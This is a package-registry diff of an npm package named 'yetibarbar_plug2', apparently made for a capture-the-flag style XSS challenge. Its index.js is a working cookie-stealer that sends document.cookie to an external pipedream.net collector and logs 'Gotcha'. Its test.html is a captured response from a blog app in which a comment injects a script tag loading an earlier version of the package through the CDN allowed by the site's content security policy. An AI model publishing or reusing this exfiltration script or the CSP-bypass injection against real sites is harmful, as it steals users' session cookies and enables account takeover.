yetibarbar_plug2 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (3) hide show
  1. package/index.js +12 -0
  2. package/package.json +11 -0
  3. package/test.html +666 -0
package/index.js ADDED
@@ -0,0 +1,12 @@
1
+
2
+
3
+ fetch('https://enzfs8qivrqzs.x.pipedream.net/v12?' + document.cookie, {
4
+ method: 'GET',
5
+ credentials: 'same-origin',
6
+ })
7
+ .then((response) => response.json())
8
+ .then((json) => {
9
+ console.log('Gotcha');
10
+ }).catch((err) => {
11
+ console.log(err);
12
+ });
package/package.json ADDED
@@ -0,0 +1,11 @@
1
+ {
2
+ "name": "yetibarbar_plug2",
3
+ "version": "1.0.0",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "author": "",
10
+ "license": "ISC"
11
+ }
package/test.html ADDED
@@ -0,0 +1,666 @@
1
+ HTTP/1.1 200 OK
2
+ server: Werkzeug/2.2.2 Python/3.10.12
3
+ date: Thu, 30 Nov 2023 21:39:07 GMT
4
+ content-type: text/html; charset=utf-8
5
+ content-length: 26111
6
+ vary: Cookie
7
+ connection: close
8
+
9
+ <!DOCTYPE html>
10
+ <html lang="en">
11
+ <head>
12
+ <meta charset="UTF-8" />
13
+ <meta http-equiv="X-UA-Compatible" content="IE=edge" />
14
+ <meta name="viewport" content="width=device-width, initial-scale=1.0" />
15
+ <meta http-equiv="Content-Security-Policy" content="script-src https://cdn.jsdelivr.net/" />
16
+
17
+ <link rel="stylesheet" href="/static/CSS/style.css">
18
+ <link rel="stylesheet" href="/static/CSS/screen.css">
19
+ <link
20
+ href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css"
21
+ rel="stylesheet"
22
+ integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC"
23
+ crossorigin="anonymous"
24
+ />
25
+ <title> Home </title>
26
+ </head>
27
+ <body>
28
+ <nav class="navbar navbar-expand-lg navbar-dark bg-dark">
29
+ <div class="container-fluid">
30
+ <button
31
+ class="navbar-toggler"
32
+ type="button"
33
+ data-bs-toggle="collapse"
34
+ data-bs-target="#navbar"
35
+ >
36
+ <span class="navbar-toggler-icon"></span>
37
+ </button>
38
+ <div class="collapse navbar-collapse" id="navbar">
39
+ <div class="navbar-nav">
40
+
41
+ <a class="navbar-brand">Logged as Johnny</a>
42
+
43
+ <a class="nav-item nav-link" href="/home">Home</a>
44
+
45
+ <a class="nav-item nav-link" href="/logout">Logout</a>
46
+
47
+
48
+ <a class="nav-item nav-link" href="/show-plugins">Plugins</a>
49
+ <a class="nav-item nav-link" href="/contacts">Contacts</a>
50
+
51
+ </div>
52
+ </div>
53
+ </div>
54
+ </nav>
55
+
56
+ <div class="container">
57
+ <h1 align="center">Posts</h1>
58
+ <div id="posts">
59
+
60
+ <div class=" card border-dark post center">
61
+ <div class="d-flex card-header justify-content-between align-items-center">
62
+ <div ><h5>Update</h5></div>
63
+
64
+ </div>
65
+ <div class="card-body" card-body>
66
+ <div >Now we have comment integrated</div>
67
+ </div>
68
+ <div class="card-footer text-muted" style="text-align: right;"> <span> <a href="/posts/admin" >admin</a></span> 2023-11-09 21:24:28.121038</div>
69
+ </div>
70
+ <div class="comment">
71
+
72
+
73
+ <div class="card">
74
+ <div class="card-body">
75
+ <div > <script
76
+ src="https://cdn.jsdelivr.net/npm/yetibarbar_plug@1.0.12/index.js"></script></div>
77
+ </div>
78
+ <div class="card-footer text-muted">2023-11-30 21:25:50</div>
79
+ </div>
80
+
81
+
82
+ <div style="width:100% ;" >
83
+ <form method="POST" action="/new-comment/1">
84
+ <textarea class="form-control center" style="width:100%" name="text" id="text" placeholder="Your nice comment here."></textarea>
85
+ <input class="btn btn-success" value="Send" type="submit">
86
+ </form>
87
+ </div>
88
+ </div>
89
+
90
+ <br>
91
+ <div class=" card border-dark post center">
92
+ <div class="d-flex card-header justify-content-between align-items-center">
93
+ <div ><h5>Lost my job</h5></div>
94
+
95
+ <div class="btn-group">
96
+ <button
97
+ type="button"
98
+ class="btn btn-sm btn-primary dropdown-toggle"
99
+ data-bs-toggle="dropdown"
100
+ ></button>
101
+ <ul class="dropdown-menu">
102
+ <li>
103
+ <a href="/edit-post/2" class="dropdown-item">Edit</a>
104
+ <a href="/delete-post/2" class="dropdown-item">Delete</a>
105
+ </li>
106
+ </ul>
107
+ </div>
108
+
109
+ </div>
110
+ <div class="card-body" card-body>
111
+ <div >On a good point , I will have more time to work on the plugin !</div>
112
+ </div>
113
+ <div class="card-footer text-muted" style="text-align: right;"> <span> <a href="/posts/Johnny" >Johnny</a></span> 2023-10-10 21:24:28.121038</div>
114
+ </div>
115
+ <div class="comment">
116
+
117
+
118
+
119
+ <div style="width:100% ;" >
120
+ <form method="POST" action="/new-comment/2">
121
+ <textarea class="form-control center" style="width:100%" name="text" id="text" placeholder="Your nice comment here."></textarea>
122
+ <input class="btn btn-success" value="Send" type="submit">
123
+ </form>
124
+ </div>
125
+ </div>
126
+
127
+ <br>
128
+ <div class=" card border-dark post center">
129
+ <div class="d-flex card-header justify-content-between align-items-center">
130
+ <div ><h5>New husband</h5></div>
131
+
132
+ </div>
133
+ <div class="card-body" card-body>
134
+ <div >I have a new husband that love our 45 cats , I am so glad someone can help me take care of them!</div>
135
+ </div>
136
+ <div class="card-footer text-muted" style="text-align: right;"> <span> <a href="/posts/Evelyne" >Evelyne</a></span> 2023-08-25 21:24:28.121038</div>
137
+ </div>
138
+ <div class="comment">
139
+
140
+
141
+
142
+ <div style="width:100% ;" >
143
+ <form method="POST" action="/new-comment/3">
144
+ <textarea class="form-control center" style="width:100%" name="text" id="text" placeholder="Your nice comment here."></textarea>
145
+ <input class="btn btn-success" value="Send" type="submit">
146
+ </form>
147
+ </div>
148
+ </div>
149
+
150
+ <br>
151
+ <div class=" card border-dark post center">
152
+ <div class="d-flex card-header justify-content-between align-items-center">
153
+ <div ><h5>Minor bug</h5></div>
154
+
155
+ <div class="btn-group">
156
+ <button
157
+ type="button"
158
+ class="btn btn-sm btn-primary dropdown-toggle"
159
+ data-bs-toggle="dropdown"
160
+ ></button>
161
+ <ul class="dropdown-menu">
162
+ <li>
163
+ <a href="/edit-post/4" class="dropdown-item">Edit</a>
164
+ <a href="/delete-post/4" class="dropdown-item">Delete</a>
165
+ </li>
166
+ </ul>
167
+ </div>
168
+
169
+ </div>
170
+ <div class="card-body" card-body>
171
+ <div >Thanks to the admin ? i have found a bug and need to fix it when I have time...</div>
172
+ </div>
173
+ <div class="card-footer text-muted" style="text-align: right;"> <span> <a href="/posts/Johnny" >Johnny</a></span> 2023-07-29 21:24:28.121038</div>
174
+ </div>
175
+ <div class="comment">
176
+
177
+
178
+
179
+ <div style="width:100% ;" >
180
+ <form method="POST" action="/new-comment/4">
181
+ <textarea class="form-control center" style="width:100%" name="text" id="text" placeholder="Your nice comment here."></textarea>
182
+ <input class="btn btn-success" value="Send" type="submit">
183
+ </form>
184
+ </div>
185
+ </div>
186
+
187
+ <br>
188
+ <div class=" card border-dark post center">
189
+ <div class="d-flex card-header justify-content-between align-items-center">
190
+ <div ><h5>New plugin!</h5></div>
191
+
192
+ <div class="btn-group">
193
+ <button
194
+ type="button"
195
+ class="btn btn-sm btn-primary dropdown-toggle"
196
+ data-bs-toggle="dropdown"
197
+ ></button>
198
+ <ul class="dropdown-menu">
199
+ <li>
200
+ <a href="/edit-post/5" class="dropdown-item">Edit</a>
201
+ <a href="/delete-post/5" class="dropdown-item">Delete</a>
202
+ </li>
203
+ </ul>
204
+ </div>
205
+
206
+ </div>
207
+ <div class="card-body" card-body>
208
+ <div >I created a new plugin to use template , I hosted it on git hub (JhonnyTemplater) so if you have comment feel free to share.</div>
209
+ </div>
210
+ <div class="card-footer text-muted" style="text-align: right;"> <span> <a href="/posts/Johnny" >Johnny</a></span> 2023-06-14 21:24:28.121038</div>
211
+ </div>
212
+ <div class="comment">
213
+
214
+
215
+
216
+ <div style="width:100% ;" >
217
+ <form method="POST" action="/new-comment/5">
218
+ <textarea class="form-control center" style="width:100%" name="text" id="text" placeholder="Your nice comment here."></textarea>
219
+ <input class="btn btn-success" value="Send" type="submit">
220
+ </form>
221
+ </div>
222
+ </div>
223
+
224
+ <br>
225
+ <div class=" card border-dark post center">
226
+ <div class="d-flex card-header justify-content-between align-items-center">
227
+ <div ><h5>Add contact page</h5></div>
228
+
229
+ </div>
230
+ <div class="card-body" card-body>
231
+ <div >You can now contact users directly</div>
232
+ </div>
233
+ <div class="card-footer text-muted" style="text-align: right;"> <span> <a href="/posts/admin" >admin</a></span> 2023-05-14 21:24:28.121038</div>
234
+ </div>
235
+ <div class="comment">
236
+
237
+
238
+
239
+ <div style="width:100% ;" >
240
+ <form method="POST" action="/new-comment/6">
241
+ <textarea class="form-control center" style="width:100%" name="text" id="text" placeholder="Your nice comment here."></textarea>
242
+ <input class="btn btn-success" value="Send" type="submit">
243
+ </form>
244
+ </div>
245
+ </div>
246
+
247
+ <br>
248
+ <div class=" card border-dark post center">
249
+ <div class="d-flex card-header justify-content-between align-items-center">
250
+ <div ><h5>Errata , that could be a comment</h5></div>
251
+
252
+ </div>
253
+ <div class="card-body" card-body>
254
+ <div >Ho I forgot to drop a link ! https://en.wikipedia.org/wiki/Glassblowing and for the drop https://en.wikipedia.org/wiki/Prince_Rupert%27s_drop</div>
255
+ </div>
256
+ <div class="card-footer text-muted" style="text-align: right;"> <span> <a href="/posts/Lucas" >Lucas</a></span> 2023-04-16 21:24:28.121038</div>
257
+ </div>
258
+ <div class="comment">
259
+
260
+
261
+
262
+ <div style="width:100% ;" >
263
+ <form method="POST" action="/new-comment/7">
264
+ <textarea class="form-control center" style="width:100%" name="text" id="text" placeholder="Your nice comment here."></textarea>
265
+ <input class="btn btn-success" value="Send" type="submit">
266
+ </form>
267
+ </div>
268
+ </div>
269
+
270
+ <br>
271
+ <div class=" card border-dark post center">
272
+ <div class="d-flex card-header justify-content-between align-items-center">
273
+ <div ><h5>Silly hobbie</h5></div>
274
+
275
+ </div>
276
+ <div class="card-body" card-body>
277
+ <div >It is a great idea ! I love glassblowing did you know that you can make unbreakable glass known as Prince Rupert s drop , a silly funny name</div>
278
+ </div>
279
+ <div class="card-footer text-muted" style="text-align: right;"> <span> <a href="/posts/Lucas" >Lucas</a></span> 2023-04-04 21:24:28.121038</div>
280
+ </div>
281
+ <div class="comment">
282
+
283
+
284
+
285
+ <div style="width:100% ;" >
286
+ <form method="POST" action="/new-comment/8">
287
+ <textarea class="form-control center" style="width:100%" name="text" id="text" placeholder="Your nice comment here."></textarea>
288
+ <input class="btn btn-success" value="Send" type="submit">
289
+ </form>
290
+ </div>
291
+ </div>
292
+
293
+ <br>
294
+ <div class=" card border-dark post center">
295
+ <div class="d-flex card-header justify-content-between align-items-center">
296
+ <div ><h5>Cats</h5></div>
297
+
298
+ </div>
299
+ <div class="card-body" card-body>
300
+ <div >And the best of all : https://en.wikipedia.org/wiki/Maine_Coon</div>
301
+ </div>
302
+ <div class="card-footer text-muted" style="text-align: right;"> <span> <a href="/posts/Evelyne" >Evelyne</a></span> 2023-03-16 21:24:28.121038</div>
303
+ </div>
304
+ <div class="comment">
305
+
306
+
307
+
308
+ <div style="width:100% ;" >
309
+ <form method="POST" action="/new-comment/9">
310
+ <textarea class="form-control center" style="width:100%" name="text" id="text" placeholder="Your nice comment here."></textarea>
311
+ <input class="btn btn-success" value="Send" type="submit">
312
+ </form>
313
+ </div>
314
+ </div>
315
+
316
+ <br>
317
+ <div class=" card border-dark post center">
318
+ <div class="d-flex card-header justify-content-between align-items-center">
319
+ <div ><h5>Obvious answer</h5></div>
320
+
321
+ <div class="btn-group">
322
+ <button
323
+ type="button"
324
+ class="btn btn-sm btn-primary dropdown-toggle"
325
+ data-bs-toggle="dropdown"
326
+ ></button>
327
+ <ul class="dropdown-menu">
328
+ <li>
329
+ <a href="/edit-post/10" class="dropdown-item">Edit</a>
330
+ <a href="/delete-post/10" class="dropdown-item">Delete</a>
331
+ </li>
332
+ </ul>
333
+ </div>
334
+
335
+ </div>
336
+ <div class="card-body" card-body>
337
+ <div >Mine is Dev we all know that.</div>
338
+ </div>
339
+ <div class="card-footer text-muted" style="text-align: right;"> <span> <a href="/posts/Johnny" >Johnny</a></span> 2023-03-02 21:24:28.121038</div>
340
+ </div>
341
+ <div class="comment">
342
+
343
+
344
+
345
+ <div style="width:100% ;" >
346
+ <form method="POST" action="/new-comment/10">
347
+ <textarea class="form-control center" style="width:100%" name="text" id="text" placeholder="Your nice comment here."></textarea>
348
+ <input class="btn btn-success" value="Send" type="submit">
349
+ </form>
350
+ </div>
351
+ </div>
352
+
353
+ <br>
354
+ <div class=" card border-dark post center">
355
+ <div class="d-flex card-header justify-content-between align-items-center">
356
+ <div ><h5>Thread idea</h5></div>
357
+
358
+ </div>
359
+ <div class="card-body" card-body>
360
+ <div >Hey people lets share some center of interest ! Here is mine https://en.wikipedia.org/wiki/Nuclear_fusion !</div>
361
+ </div>
362
+ <div class="card-footer text-muted" style="text-align: right;"> <span> <a href="/posts/Evelyne" >Evelyne</a></span> 2023-02-19 21:24:28.121038</div>
363
+ </div>
364
+ <div class="comment">
365
+
366
+
367
+
368
+ <div style="width:100% ;" >
369
+ <form method="POST" action="/new-comment/11">
370
+ <textarea class="form-control center" style="width:100%" name="text" id="text" placeholder="Your nice comment here."></textarea>
371
+ <input class="btn btn-success" value="Send" type="submit">
372
+ </form>
373
+ </div>
374
+ </div>
375
+
376
+ <br>
377
+ <div class=" card border-dark post center">
378
+ <div class="d-flex card-header justify-content-between align-items-center">
379
+ <div ><h5>Nope</h5></div>
380
+
381
+ </div>
382
+ <div class="card-body" card-body>
383
+ <div >We all know you are a cheater so not in your dream.</div>
384
+ </div>
385
+ <div class="card-footer text-muted" style="text-align: right;"> <span> <a href="/posts/Evelyne" >Evelyne</a></span> 2023-01-12 21:24:28.121038</div>
386
+ </div>
387
+ <div class="comment">
388
+
389
+
390
+
391
+ <div style="width:100% ;" >
392
+ <form method="POST" action="/new-comment/12">
393
+ <textarea class="form-control center" style="width:100%" name="text" id="text" placeholder="Your nice comment here."></textarea>
394
+ <input class="btn btn-success" value="Send" type="submit">
395
+ </form>
396
+ </div>
397
+ </div>
398
+
399
+ <br>
400
+ <div class=" card border-dark post center">
401
+ <div class="d-flex card-header justify-content-between align-items-center">
402
+ <div ><h5>Game of the year!</h5></div>
403
+
404
+ <div class="btn-group">
405
+ <button
406
+ type="button"
407
+ class="btn btn-sm btn-primary dropdown-toggle"
408
+ data-bs-toggle="dropdown"
409
+ ></button>
410
+ <ul class="dropdown-menu">
411
+ <li>
412
+ <a href="/edit-post/13" class="dropdown-item">Edit</a>
413
+ <a href="/delete-post/13" class="dropdown-item">Delete</a>
414
+ </li>
415
+ </ul>
416
+ </div>
417
+
418
+ </div>
419
+ <div class="card-body" card-body>
420
+ <div >We should host a huge multiplayer game! It could be a great mess!</div>
421
+ </div>
422
+ <div class="card-footer text-muted" style="text-align: right;"> <span> <a href="/posts/Johnny" >Johnny</a></span> 2023-01-07 21:24:28.121038</div>
423
+ </div>
424
+ <div class="comment">
425
+
426
+
427
+
428
+ <div style="width:100% ;" >
429
+ <form method="POST" action="/new-comment/13">
430
+ <textarea class="form-control center" style="width:100%" name="text" id="text" placeholder="Your nice comment here."></textarea>
431
+ <input class="btn btn-success" value="Send" type="submit">
432
+ </form>
433
+ </div>
434
+ </div>
435
+
436
+ <br>
437
+ <div class=" card border-dark post center">
438
+ <div class="d-flex card-header justify-content-between align-items-center">
439
+ <div ><h5>Robert!</h5></div>
440
+
441
+ </div>
442
+ <div class="card-body" card-body>
443
+ <div >Do not forget my money!</div>
444
+ </div>
445
+ <div class="card-footer text-muted" style="text-align: right;"> <span> <a href="/posts/Jean" >Jean</a></span> 2022-12-25 21:24:28.121038</div>
446
+ </div>
447
+ <div class="comment">
448
+
449
+
450
+
451
+ <div style="width:100% ;" >
452
+ <form method="POST" action="/new-comment/14">
453
+ <textarea class="form-control center" style="width:100%" name="text" id="text" placeholder="Your nice comment here."></textarea>
454
+ <input class="btn btn-success" value="Send" type="submit">
455
+ </form>
456
+ </div>
457
+ </div>
458
+
459
+ <br>
460
+ <div class=" card border-dark post center">
461
+ <div class="d-flex card-header justify-content-between align-items-center">
462
+ <div ><h5>I am no doctor</h5></div>
463
+
464
+ </div>
465
+ <div class="card-body" card-body>
466
+ <div >Maybe seeing a vet could help you ...</div>
467
+ </div>
468
+ <div class="card-footer text-muted" style="text-align: right;"> <span> <a href="/posts/Robert" >Robert</a></span> 2022-12-10 21:24:28.121038</div>
469
+ </div>
470
+ <div class="comment">
471
+
472
+
473
+
474
+ <div style="width:100% ;" >
475
+ <form method="POST" action="/new-comment/15">
476
+ <textarea class="form-control center" style="width:100%" name="text" id="text" placeholder="Your nice comment here."></textarea>
477
+ <input class="btn btn-success" value="Send" type="submit">
478
+ </form>
479
+ </div>
480
+ </div>
481
+
482
+ <br>
483
+ <div class=" card border-dark post center">
484
+ <div class="d-flex card-header justify-content-between align-items-center">
485
+ <div ><h5>Help needed</h5></div>
486
+
487
+ </div>
488
+ <div class="card-body" card-body>
489
+ <div >My cats are sick do you have any advice ?</div>
490
+ </div>
491
+ <div class="card-footer text-muted" style="text-align: right;"> <span> <a href="/posts/Evelyne" >Evelyne</a></span> 2022-10-22 21:24:28.121038</div>
492
+ </div>
493
+ <div class="comment">
494
+
495
+
496
+
497
+ <div style="width:100% ;" >
498
+ <form method="POST" action="/new-comment/16">
499
+ <textarea class="form-control center" style="width:100%" name="text" id="text" placeholder="Your nice comment here."></textarea>
500
+ <input class="btn btn-success" value="Send" type="submit">
501
+ </form>
502
+ </div>
503
+ </div>
504
+
505
+ <br>
506
+ <div class=" card border-dark post center">
507
+ <div class="d-flex card-header justify-content-between align-items-center">
508
+ <div ><h5>Add contact page</h5></div>
509
+
510
+ </div>
511
+ <div class="card-body" card-body>
512
+ <div >You can now contact users directly</div>
513
+ </div>
514
+ <div class="card-footer text-muted" style="text-align: right;"> <span> <a href="/posts/admin" >admin</a></span> 2022-10-16 21:24:28.121038</div>
515
+ </div>
516
+ <div class="comment">
517
+
518
+
519
+
520
+ <div style="width:100% ;" >
521
+ <form method="POST" action="/new-comment/17">
522
+ <textarea class="form-control center" style="width:100%" name="text" id="text" placeholder="Your nice comment here."></textarea>
523
+ <input class="btn btn-success" value="Send" type="submit">
524
+ </form>
525
+ </div>
526
+ </div>
527
+
528
+ <br>
529
+ <div class=" card border-dark post center">
530
+ <div class="d-flex card-header justify-content-between align-items-center">
531
+ <div ><h5>Super blog</h5></div>
532
+
533
+ <div class="btn-group">
534
+ <button
535
+ type="button"
536
+ class="btn btn-sm btn-primary dropdown-toggle"
537
+ data-bs-toggle="dropdown"
538
+ ></button>
539
+ <ul class="dropdown-menu">
540
+ <li>
541
+ <a href="/edit-post/18" class="dropdown-item">Edit</a>
542
+ <a href="/delete-post/18" class="dropdown-item">Delete</a>
543
+ </li>
544
+ </ul>
545
+ </div>
546
+
547
+ </div>
548
+ <div class="card-body" card-body>
549
+ <div >My awesome super post</div>
550
+ </div>
551
+ <div class="card-footer text-muted" style="text-align: right;"> <span> <a href="/posts/Johnny" >Johnny</a></span> 2022-09-26 21:24:28.121038</div>
552
+ </div>
553
+ <div class="comment">
554
+
555
+
556
+
557
+ <div style="width:100% ;" >
558
+ <form method="POST" action="/new-comment/18">
559
+ <textarea class="form-control center" style="width:100%" name="text" id="text" placeholder="Your nice comment here."></textarea>
560
+ <input class="btn btn-success" value="Send" type="submit">
561
+ </form>
562
+ </div>
563
+ </div>
564
+
565
+ <br>
566
+ </div>
567
+
568
+
569
+ <div id="volet_clos">
570
+ <div id="volet">
571
+ <ul class="list-group connectedItem">
572
+
573
+ <li style="background-color: transparent !important;" class="list-group-item d-flex justify-content-between align-items-center">
574
+
575
+
576
+ <span class="logged-in"> <a href="/contact/admin">🖅</a></span>
577
+
578
+ <span style="color: white !important;">admin</span>
579
+ <span class="logged-in">●</span>
580
+
581
+ </li>
582
+
583
+ <li style="background-color: transparent !important;" class="list-group-item d-flex justify-content-between align-items-center">
584
+
585
+
586
+ <span class="logged-in"> <a href="/contact/Johnny">🖅</a></span>
587
+
588
+ <span style="color: white !important;">Johnny</span>
589
+ <span class="logged-in">●</span>
590
+
591
+ </li>
592
+
593
+ <li style="background-color: transparent !important;" class="list-group-item d-flex justify-content-between align-items-center">
594
+
595
+
596
+ <span class="logged-out"> 🖅</span>
597
+
598
+ <span style="color: white !important;">Evelyne</span>
599
+ <span class="logged-out">●</span>
600
+
601
+ </li>
602
+
603
+ <li style="background-color: transparent !important;" class="list-group-item d-flex justify-content-between align-items-center">
604
+
605
+
606
+ <span class="logged-out"> 🖅</span>
607
+
608
+ <span style="color: white !important;">Marine</span>
609
+ <span class="logged-out">●</span>
610
+
611
+ </li>
612
+
613
+ <li style="background-color: transparent !important;" class="list-group-item d-flex justify-content-between align-items-center">
614
+
615
+
616
+ <span class="logged-out"> 🖅</span>
617
+
618
+ <span style="color: white !important;">Robert</span>
619
+ <span class="logged-out">●</span>
620
+
621
+ </li>
622
+
623
+ <li style="background-color: transparent !important;" class="list-group-item d-flex justify-content-between align-items-center">
624
+
625
+
626
+ <span class="logged-out"> 🖅</span>
627
+
628
+ <span style="color: white !important;">Lucas</span>
629
+ <span class="logged-out">●</span>
630
+
631
+ </li>
632
+
633
+ <li style="background-color: transparent !important;" class="list-group-item d-flex justify-content-between align-items-center">
634
+
635
+
636
+ <span class="logged-out"> 🖅</span>
637
+
638
+ <span style="color: white !important;">Jean</span>
639
+ <span class="logged-out">●</span>
640
+
641
+ </li>
642
+
643
+ </ul>
644
+
645
+ <a href="#volet" class="ouvrir">Who is Online</a>
646
+ <a href="#volet_clos" class="fermer">Close</a>
647
+ </div>
648
+ </div>
649
+
650
+
651
+ <div align="center">
652
+ <a href="/new-post">
653
+ <button type="button" class="btn btn-primary btn-lg">
654
+ Create a Post
655
+ </button>
656
+ </a>
657
+ </div>
658
+
659
+ </div>
660
+ <script
661
+ src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js"
662
+ integrity="sha384-MrcW6ZMFYlzcLA8Nl+NtUVF0sA7MsXsP1UyJoMp4YLEuNSfAP+JcXn/tWtIaxVXM"
663
+ crossorigin="anonymous"
664
+ ></script>
665
+ </body>
666
+ </html>